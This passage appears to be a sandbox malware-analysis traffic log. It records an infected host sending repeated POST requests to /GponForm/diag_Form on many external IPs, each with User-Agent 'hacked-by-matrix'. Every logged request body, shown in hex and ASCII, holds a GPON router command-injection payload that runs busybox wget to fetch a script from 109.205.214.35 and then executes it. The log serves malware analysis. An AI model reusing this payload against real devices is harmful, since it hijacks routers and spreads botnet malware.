                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1907192.168.2.1353394118.190.121.77443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.825575113 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1908192.168.2.1336120118.214.4.243443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.825611115 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1909192.168.2.1357022118.133.106.9443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.825664997 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1910192.168.2.1336112109.37.182.251443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.825691938 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1911192.168.2.1353984118.141.230.159443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.825695038 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1912192.168.2.13592125.49.122.187443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.825726986 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1913192.168.2.13397325.151.178.89443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.825727940 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1914192.168.2.133313442.67.24.239443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.825807095 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1915192.168.2.13512725.62.123.36443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.825814962 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1916192.168.2.1346378118.167.151.204443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.825845003 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1917192.168.2.1352174109.223.134.53443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.825925112 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1918192.168.2.13432545.35.185.247443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.825927973 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1919192.168.2.1339270118.100.2.155443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.825927973 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1920192.168.2.13347185.254.49.129443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.825953960 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1921192.168.2.136044442.224.6.55443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.825975895 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1922192.168.2.1360868109.180.215.126443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.825985909 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1923192.168.2.13515725.179.83.138443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.826024055 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1924192.168.2.1341766212.246.190.45443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.826057911 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1925192.168.2.135237842.211.237.103443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.826066017 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1926192.168.2.1349414109.86.5.18443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.826082945 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1927192.168.2.1340608212.227.233.2443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.826096058 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1928192.168.2.134100442.217.207.46443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.826107025 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1929192.168.2.1337896118.248.33.59443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.826689959 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
